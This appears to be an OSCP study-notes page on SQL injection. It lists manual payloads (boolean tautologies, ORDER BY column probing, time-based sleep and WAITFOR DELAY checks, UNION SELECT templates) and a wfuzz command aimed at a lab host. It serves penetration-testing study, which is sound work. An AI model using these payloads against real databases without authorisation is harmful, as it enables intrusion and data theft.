> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/sql-injection.md).

# SQL Injection

## Manual

<pre><code>' or 1=1
' or 1=1-- - 
' or 1=1#
' or 1=1/
' or 1=1-- - //
<strong>' order by 1 -- -
</strong>' order by 1-- #
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3),'false') -- //
union select &#x3C;number of columns>   
</code></pre>

{% hint style="info" %}
AND can be used to replace OR as well
{% endhint %}

```
%
If an application accepts a % as a wildcard the query most likely is putting 
%'s inbetween the input (%joe%) to find something "like" the input
```

{% hint style="info" %}
Test on php applications like  ![](/files/UtYzQo8GQy8nFilkPCZH) for example
{% endhint %}

Fuzz with special characters

```
wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404
```

After finding an injection spot try to figure out how the query is structured

{% embed url="<https://dev.mysql.com/doc/refman/8.4/en/select.html>" %}

{% hint style="info" %}
With UNION SELECT you must have the same amount of parameters on the right side as you do on the left
{% endhint %}

{% embed url="<https://htb.adot8.com/hack-the-box/oscp-like-boxes/linux/jarvis/eumeration/80>" %}

If the initial query is false then we can overwrite the output. We can insert payloads into one of the parameters

```
union select 1,2,(<Payload>),3,4,5,6,7
```
